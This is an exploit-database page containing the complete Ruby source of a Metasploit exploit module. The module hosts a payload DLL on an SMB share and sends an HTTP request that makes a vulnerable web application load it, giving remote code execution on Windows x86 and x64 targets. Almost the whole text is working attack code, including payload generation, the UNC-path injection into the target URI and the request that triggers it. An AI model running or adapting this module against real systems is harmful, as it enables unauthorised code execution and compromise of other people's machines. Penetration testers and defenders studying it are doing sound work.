Generic Web Application DLL Injection



EKU-ID: 4623 CVE: OSVDB-ID:
Author: Matthew Hall Published: 2015-03-05 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where a HTTP request
        triggers a DLL load from an specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => 'Mar 04 2015'
      ))

      register_options(
        [
          OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
          OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
        ], self.class)

      deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    sploit = target_uri.to_s
    sploit << unc

    print_status("#{peer} - Trying to ")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end